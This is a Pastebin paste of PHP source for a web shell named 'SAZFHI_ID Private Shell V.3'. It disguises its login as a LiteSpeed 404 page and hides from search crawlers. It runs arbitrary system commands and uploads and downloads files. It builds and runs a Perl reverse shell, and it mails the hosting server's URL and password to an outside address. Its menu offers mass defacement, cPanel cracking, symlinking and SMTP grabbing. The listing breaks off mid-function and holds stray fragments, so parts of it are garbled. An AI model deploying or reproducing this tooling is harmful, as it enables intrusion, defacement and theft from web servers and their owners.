Mr_G4L4XY_ID

SAZFHI_ID Private Shell V.3

Aug 30th, 2018
798
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 117.44 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "dd6604b49e085eda23b484f59cd5c21d";
  14. $SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22.         header('HTTP/1.0 404 Not Found');
  23.         exit;
  24.     }
  25. }
  26. function login_shell() {
  27. ?>
  28. <html style="height:100%">
  29. <head><title> 404 Not Found
  30. </title></head>
  31. <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
  32. <style>
  33.     input[type=password] {
  34.     width: 250px;
  35.     height: 25px;
  36.     color: black;
  37.     background: #black;
  38.     border: 1px solid #ffffff;
  39.     padding: 5px;
  40.     text-align: center;
  41.     transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
  42.     -webkit-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
  43.     -moz-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
  44.     -ms-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
  45. }
  46. </style>    
  47. <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
  48.         <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
  49. <h2 style="margin-top:20px;font-size: 30px;">Not Found
  50. </h2>
  51. <p>The resource requested could not be found on this server!</p>
  52. <div>
  53. <form method="post">
  54. <input type="password" name="pass">
  55. </form>
  56.     </div>
  57. </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
  58. <br>Proudly powered by  <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
  59. <?php
  60. exit;
  61. }
  62. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  63.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  64.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  65.     else
  66.         login_shell();
  67. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  68.     @ob_clean();
  69.     $file = $_GET['file'];
  70.     header('Content-Description: File Transfer');
  71.     header('Content-Type: application/octet-stream');
  72.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  73.     header('Expires: 0');
  74.     header('Cache-Control: must-revalidate');
  75.     header('Pragma: public');
  76.     header('Content-Length: ' . filesize($file));
  77.     readfile($file);
  78.     exit;
  79. }
  80. ?>
  81. <html>
  82. <head>
  83. <title>SAZFHI_!D Private Shell V.3</title>
  84. <meta name='author' content='SAZFHI_!D'>
  85. <meta charset="UTF-8">
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  88. html {
  89.     background: black;
  90.     background-image:url(https://images4.alphacoders.com/246/thumb-1920-246244.jpg);
  91.     background-position:top    
  92.     center;background-size:cover;
  93.     background-attachment:fixed;
  94.     background-repeat:no-repeat;
  95.     color: gold;
  96.     font-family: 'Ubuntu';
  97.     font-size: 13px;
  98.     width: 100%;
  99. }
  100. li {
  101.     display: inline;
  102.     margin: 5px;
  103.     padding: 5px;
  104. }
  105. table, th, td {
  106.     border-collapse:collapse;
  107.     font-family: Tahoma, Geneva, sans-serif;
  108.     background: transparent;
  109.     font-family: 'Ubuntu';
  110.     font-size: 13px;
  111. }
  112. .table_home, .th_home, .td_home {
  113.     border: 1px solid #ffffff;
  114. }
  115. th {
  116.     padding: 10px;
  117. }
  118. a {
  119.     color: #ffffff;
  120.     text-decoration: none;
  121. }
  122. a:hover {
  123.     color: gold;
  124.     text-decoration: underline;
  125. }
  126. b {
  127.     color: gold;
  128. }
  129. input[type=text], input[type=password],input[type=submit] {
  130.     background: transparent;
  131.     color: #ffffff;
  132.     border: 1px solid #ffffff;
  133.     margin: 5px auto;
  134.     padding-left: 5px;
  135.     font-family: 'Ubuntu';
  136.     font-size: 13px;
  137. }
  138. textarea {
  139.     border: 1px solid #ffffff;
  140.     width: 100%;
  141.     height: 400px;
  142.     padding-left: 5px;
  143.     margin: 10px auto;
  144.     resize: none;
  145.     background: transparent;
  146.     color: #ffffff;
  147.     font-family: 'Ubuntu';
  148.     font-size: 13px;
  149. }
  150. select {
  151.     width: 152px;
  152.     background: #000000;
  153.     color: lime;
  154.     border: 1px solid #ffffff;
  155.     margin: 5px auto;
  156.     padding-left: 5px;
  157.     font-family: 'Ubuntu';
  158.     font-size: 13px;
  159. }
  160. option:hover {
  161.     background: lime;
  162.     color: #000000;
  163. }
  164. </style>
  165. </head>
  166. <?php
  167. function w($dir,$perm) {
  168.     if(!is_writable($dir)) {
  169.         return "<font color=red>".$perm."</font>";
  170.     } else {
  171.         return "<font color=lime>".$perm."</font>";
  172.     }
  173. }
  174. function r($dir,$perm) {
  175.     if(!is_readable($dir)) {
  176.         return "<font color=red>".$perm."</font>";
  177.     } else {
  178.         return "<font color=lime>".$perm."</font>";
  179.     }
  180. }
  181. function exe($cmd) {
  182.     if(function_exists('system')) {        
  183.         @ob_start();       
  184.         @system($cmd);     
  185.         $buff = @ob_get_contents();        
  186.         @ob_end_clean();       
  187.         return $buff;  
  188.     } elseif(function_exists('exec')) {        
  189.         @exec($cmd,$results);      
  190.         $buff = "";        
  191.         foreach($results as $result) {         
  192.             $buff .= $result;      
  193.         } return $buff;    
  194.     } elseif(function_exists('passthru')) {        
  195.         @ob_start();       
  196.         @passthru($cmd);       
  197.         $buff = @ob_get_contents();        
  198.         @ob_end_clean();       
  199.         return $buff;  
  200.     } elseif(function_exists('shell_exec')) {      
  201.         $buff = @shell_exec($cmd);     
  202.         return $buff;  
  203.     }
  204. }
  205. function perms($file){
  206.     $perms = fileperms($file);
  207.     if (($perms & 0xC000) == 0xC000) {
  208.     // Socket
  209.     $info = 's';
  210.     } elseif (($perms & 0xA000) == 0xA000) {
  211.     // Symbolic Link
  212.     $info = 'l';
  213.     } elseif (($perms & 0x8000) == 0x8000) {
  214.     // Regular
  215.     $info = '-';
  216.     } elseif (($perms & 0x6000) == 0x6000) {
  217.     // Block special
  218.     $info = 'b';
  219.     } elseif (($perms & 0x4000) == 0x4000) {
  220.     // Directory
  221.     $info = 'd';
  222.     } elseif (($perms & 0x2000) == 0x2000) {
  223.     // Character special
  224.     $info = 'c';
  225.     } elseif (($perms & 0x1000) == 0x1000) {
  226.     // FIFO pipe
  227.     $info = 'p';
  228.     } else {
  229.     // Unknown
  230.     $info = 'u';
  231.     }
  232.         // Owner
  233.     $info .= (($perms & 0x0100) ? 'r' : '-');
  234.     $info .= (($perms & 0x0080) ? 'w' : '-');
  235.     $info .= (($perms & 0x0040) ?
  236.     (($perms & 0x0800) ? 's' : 'x' ) :
  237.     (($perms & 0x0800) ? 'S' : '-'));
  238.     // Group
  239.     $info .= (($perms & 0x0020) ? 'r' : '-');
  240.     $info .= (($perms & 0x0010) ? 'w' : '-');
  241.     $info .= (($perms & 0x0008) ?
  242.     (($perms & 0x0400) ? 's' : 'x' ) :
  243.     (($perms & 0x0400) ? 'S' : '-'));
  244.     // World
  245.     $info .= (($perms & 0x0004) ? 'r' : '-');
  246.     $info .= (($perms & 0x0002) ? 'w' : '-');
  247.     $info .= (($perms & 0x0001) ?
  248.     (($perms & 0x0200) ? 't' : 'x' ) :
  249.     (($perms & 0x0200) ? 'T' : '-'));
  250.     return $info;
  251. }
  252. function hdd($s) {
  253.     if($s >= 1073741824)
  254.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  255.     elseif($s >= 1048576)
  256.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  257.     elseif($s >= 1024)
  258.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  259.     else
  260.     return $s .' B';
  261. }
  262. function ambilKata($param, $kata1, $kata2){
  263.     if(strpos($param, $kata1) === FALSE) return FALSE;
  264.     if(strpos($param, $kata2) === FALSE) return FALSE;
  265.     $start = strpos($param, $kata1) + strlen($kata1);
  266.     $end = strpos($param, $kata2, $start);
  267.     $return = substr($param, $start, $end - $start);
  268.     return $return;
  269. }
  270. function getsource($url) {
  271.     $curl = curl_init($url);
  272.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  273.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  274.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  275.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  276.     $content = curl_exec($curl);
  277.             curl_close($curl);
  278.     return $content;
  279. }
  280. function bing($dork) {
  281.     $npage = 1;
  282.     $npages = 30000;
  283.     $allLinks = array();
  284.     $lll = array();
  285.     while($npage <= $npages) {
  286.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  287.         if($x) {
  288.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  289.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  290.             $npage = $npage + 10;
  291.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  292.         } else break;
  293.     }
  294.     $URLs = array();
  295.     foreach($allLinks as $url){
  296.         $exp = explode("/", $url);
  297.         $URLs[] = $exp[2];
  298.     }
  299.     $array = array_filter($URLs);
  300.     $array = array_unique($array);
  301.     $sss = count(array_unique($array));
  302.     foreach($array as $domain) {
  303.         echo $domain."\n";
  304.     }
  305. }
  306. function reverse($url) {
  307.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  308.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  309.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  310.           curl_setopt($ch, CURLOPT_HEADER, 0);
  311.           curl_setopt($ch, CURLOPT_POST, 1);
  312.     $resp = curl_exec($ch);
  313.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  314.     $array = explode(",,", $resp);
  315.     unset($array[0]);
  316.     foreach($array as $lnk) {
  317.         $lnk = "http://$lnk";
  318.         $lnk = str_replace(",", "", $lnk);
  319.         echo $lnk."\n";
  320.         ob_flush();
  321.         flush();
  322.     }
  323.         curl_close($ch);
  324. }
  325. if(get_magic_quotes_gpc()) {
  326.     function idx_ss($array) {
  327.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  328.     }
  329.     $_POST = idx_ss($_POST);
  330.     $_COOKIE = idx_ss($_COOKIE);
  331. }
  332.  
  333. if(isset($_GET['dir'])) {
  334.     $dir = $_GET['dir'];
  335.     chdir($dir);
  336. } else {
  337.     $dir = getcwd();
  338. }
  339. $email = "lapor@sazfhi.ooo";
  340. if(!empty($email)) {
  341.             @mail($email, "Report", "URL : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n\nIP : ".$_SERVER['REMOTE_ADDR']."\n\nPassword : ".$auth_pass."\n\n", "From:SAZFHI_ID");
  342.         }
  343.  
  344. $kernel = php_uname();
  345. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  346. $dir = str_replace("\\","/",$dir);
  347. $scdir = explode("/", $dir);
  348. $freespace = hdd(disk_free_space("/"));
  349. $total = hdd(disk_total_space("/"));
  350. $used = $total - $freespace;
  351. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  352. $ds = @ini_get("disable_functions");
  353. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  354. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  355. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  356. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  357. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  358. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  359. if(!function_exists('posix_getegid')) {
  360.     $user = @get_current_user();
  361.     $uid = @getmyuid();
  362.     $gid = @getmygid();
  363.     $group = "?";
  364. } else {
  365.     $uid = @posix_getpwuid(posix_geteuid());
  366.     $gid = @posix_getgrgid(posix_getegid());
  367.     $user = $uid['name'];
  368.     $uid = $uid['uid'];
  369.     $group = $gid['name'];
  370.     $gid = $gid['gid'];
  371. }
  372. echo "<hr color=blue>";
  373. echo "<center><h1>SAZFHI_ID PRIVATE SHELL V.3</h1></center>";
  374. echo "<hr color=blue>";
  375. echo "SYSTEM    &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <font color=lime>".$kernel."</font><br>";
  376. echo "SERVER IP  &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <font color=lime>".$ip."</font> | YOUR IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  377. echo "USER | GROUP&nbsp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <font color=lime>".$user."</font> (".$uid.") | GROUP : <font color=lime>".$group."</font> (".$gid.")<br>";
  378. echo "HDD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  379. echo "SAFE MODE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <font color=lime>$sm</font><br>";
  380. echo "DISABLE FUNCTIONS : <font color=lime>$show_ds</font><br>";
  381. echo "MYSQL  &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  382. echo "<hr color=lime>";
  383. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  384.  
  385. echo "Current DIR: ";
  386. foreach($scdir as $c_dir => $cdir) {   
  387.     echo "<a href='?dir=";
  388.     for($i = 0; $i <= $c_dir; $i++) {
  389.         echo $scdir[$i];
  390.         if($i != $c_dir) {
  391.         echo "/";
  392.         }
  393.     }
  394.     echo "'>$cdir</a>/";
  395. }
  396. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  397. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  398. echo "<form method='post'>
  399.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  400.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  401.     </form>";
  402.     if($_POST['do_cmd']) {
  403.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  404.     }
  405. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  406. echo "<form method='post' enctype='multipart/form-data'>
  407.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  408.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  409.     <input type='file' name='ix_file'>
  410.     <input type='submit' value='upload' name='upload'>
  411.     </form>";
  412. if($_POST['upload']) {
  413.         if($_POST['tipe_upload'] == 'biasa') {
  414.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  415.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  416.             } else {
  417.                 $act = "<font color=red>failed to upload file</font>";
  418.             }
  419.         } else {
  420.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  421.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  422.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  423.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  424.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  425.                 } else {
  426.                     $act = "<font color=red>failed to upload file</font>";
  427.                 }
  428.             } else {
  429.                 $act = "<font color=red>failed to upload file</font>";
  430.             }
  431.         }
  432.     }
  433. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  434. echo "<hr color=lime>";
  435. echo "<center>";
  436. echo "<ul>";
  437. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  438. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  439. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  440. echo "<li>[ <a href='?dir=$dir&do=bconnet'>Back Connect</a> ]</li>";
  441. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  442. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  443. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  444. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  445. echo "<li>[ <a href='?dir=$dir&do=domain'>Domains Viewer</a> ]</li>";
  446. echo "<li>[ <a href='?dir=$dir&do=endeco'>Encode Decode</a> ]</li>";
  447. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  448. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li><br>";
  449. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  450. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  451. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  452. echo "<li>[ <a href='?dir=$dir&do=network'>Network</a> ]</li>";
  453. echo "<li>[ <a href='?dir=$dir&do=reverseip'>Reverse IP</a> ]</li>";
  454. echo "<li>[ <a href='?dir=$dir&do=hasher'>Password Hasher</a> ]</li>";
  455. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
  456. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  457. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  458. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  459. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li><br>";
  460. echo "<li>[ <a style='color: red; font-weight: bold;' href='?'>Home</a> ]</li>";
  461. echo "<li>[ <a style='color: red; font-weight: bold;' href='?logout=true'>Logout</a> ]</li>";
  462. echo "<li>[ <a style='color: red; font-weight: bold;' href='?dir=$dir&do=kill'>Kill</a> ]</li>";
  463. echo "</ul>";
  464. echo "</center>";
  465. echo "<hr color=lime>";
  466. if($_GET['logout'] == true) {
  467.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  468.     echo "<script>window.location='?';</script>";
  469.    
  470. }
  471.  
  472. elseif($_GET['do'] == 'bconnet') {
  473.         echo '<center><div id="login" style="margin-top: 10px; margin-left: 10px;">';
  474.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  475.         echo 'IP:<input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  476.         echo 'Port:<input type="text" name="port" value="666" style="margin-top: 5px;"/><br><input type="submit" value="Connect" />';
  477.         echo '</form>';
  478.         echo '</div></center>';
  479.         if(isset($_GET['ip']) && isset($_GET['port'])){
  480.             $ip = $_GET['ip'];
  481.             $port = $_GET['port'];
  482.             $bc = fopen("/tmp/bxcon.pl","w");
  483.             fwrite($bc,'#!/usr/bin/perl
  484. use Socket;
  485. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  486. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  487. $proto=getprotobyname("tcp");
  488. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  489. connect(SOCKET, $paddr) || die("Error: $!\n");
  490. open(STDIN, ">&SOCKET");
  491. open(STDOUT, ">&SOCKET");
  492. open(STDERR, ">&SOCKET");
  493. system("/bin/sh -i");
  494. close(STDIN);
  495. close(STDOUT);
  496. close(STDERR);');
  497.             fclose($bc);
  498.             shell_exec("perl /tmp/bxcon.pl");
  499.             unlink("/tmp/bxcon.pl");
  500.         }
  501.     break;
  502.  
  503.  
  504.  
  505. echo '</td>
  506. </tr>
  507. </table>
  508. <br><center>xB1N4RYx ~ 2012</center><br>
  509. </body>
  510. </html>';
  511. function rooting()
  512. {
  513. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  514. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  515. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  516. if( $_POST['_upl'] == "Upload" ) {
  517.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  518.     else { echo '<b>Basarisiz</b><br><br>'; }
  519. }
  520. }
  521. $x = $_GET["x"];
  522. Switch($x){
  523. case "rooting";
  524.     rooting();
  525.     break;
  526.    
  527.     }
  528.         }
  529.  
  530. elseif($_GET['do'] == 'endeco') {
  531.  
  532. @ini_set('output_buffering',0);
  533. @ini_set('display_errors', 0);
  534. $text = $_POST['code'];
  535. ?>
  536. <form method="post"><br>
  537. <textarea class='form-control con7' cols=80 rows=10 name="code"></textarea><br><br>
  538. <select class='form-control con7' size="1" name="ope">
  539. <center><option value="urlencode">url</option>
  540. <option value="base64">Base64</option>
  541. <option value="ur">convert_uu</option>
  542. <option value="json">json</option>
  543. <option value="gzinflates">gzinflate - base64</option>
  544. <option value="str2">str_rot13 - base64</option>
  545. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  546. <option value="gzinflater">gzinflate - str_rot13 - base64</option>
  547. <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
  548. <option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
  549. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  550. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  551. </select>&nbsp;<br><br><input class='kntd' type='submit' name='submit' value='Encode'>
  552. <input class='kntd' type='submit' name='submits' value='Decode'>
  553. <center></form>
  554. <br>
  555. <?php
  556. $submit = $_POST['submit'];
  557. if (isset($submit)){
  558. $op = $_POST["ope"];
  559. switch ($op) {case 'base64': $codi=base64_encode($text);
  560. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  561. break;case 'json' : $codi=json_encode(utf8_encode($text));
  562. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  563. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  564. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  565. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  566. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  567. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  568. break;case 'urlencode' : $codi=rawurlencode($text);
  569. break;case 'ur' : $codi=convert_uuencode($text);
  570. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  571. break;default:break;}}
  572.  
  573. $submit = $_POST['submits'];
  574. if (isset($submit)){
  575. $op = $_POST["ope"];
  576. switch ($op) {case 'base64': $codi=base64_decode($text);
  577. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  578. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  579. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  580. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  581. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  582. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  583. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  584. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  585. break;case 'urlencode' : $codi=rawurldecode($text);
  586. break;case 'ur' : $codi=convert_uudecode($text);
  587. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  588. break;default:break;}}
  589. $html = htmlentities(stripslashes($codi));
  590. echo "<from><textarea cols=80 rows=10 class='form-control con7' >".$html."</textarea><BR/><BR/></center><br></from>";
  591.  
  592.  
  593.  
  594. }
  595.  
  596. elseif($_GET['do'] == 'hasher') {
  597.  $submit = $_POST['go'];
  598.    
  599.  if (isset($submit)) {
  600.      
  601.     $pass = $_POST['password']; // password  
  602.     $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  603.     $hash = md5($pass); // md5 hash
  604.     $md2 = hash('md2',$_POST['password']); // md2 hash
  605.     $md4 = hash("md4", $pass); // md4
  606.     $hash_md5 = md5($salt . $pass); // md5 hash with salt
  607.     $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1
  608.     $hash1 = sha1($pass); // sha1 hash
  609.     $sha256 = hash("sha256", $text); // sha256
  610.     $sha384 = hash('sha384',$_POST['password']); // sha384
  611.     $sha512 = hash('sha512',$_POST['password']); // sha512
  612.     $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt
  613.     $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5
  614.      
  615.    
  616.     }
  617.    echo '<form action="" method="post"><b> ';
  618.  
  619.    echo " <center><font color='lime'> Kata : ";
  620.    echo "<br>";
  621.    echo ' <input type="text" name="password" size="50" />';
  622.    echo '<input type="submit" name="go" value=">>" />';
  623.    echo ' <br>';
  624.    echo ' <h2>Hasil Hash</h2></th></tr>';
  625.    echo '<br>';
  626.    echo ' Original Password <br> <input class=inputz type=text size=50 value=' . $pass . '> <br><br>';
  627.    echo ' MD5 <br> <input class=inputz type=text size=50 value=' . $hash . '> <br><br>';
  628.    echo ' MD2 <br> <input class=inputz type=text size=50 value=' . $md2 . '> <br><br>';
  629.    echo ' MD4 <br> <input class=inputz type=text size=50 value=' . $md4 . '> <br><br>';
  630.    echo ' MD5 with Salt <br> <input class=inputz type=text size=50 value=' . $hash_md5 . '> <br><br>';
  631.    echo ' MD5 with Salt & Sha1 <br> <input class=inputz type=text size=50 value=' . $hash_md5_double . '> <br><br>';
  632.    echo ' Sha1 <br> <input class=inputz type=text size=50 value=' . $hash1 . '> <br><br>';
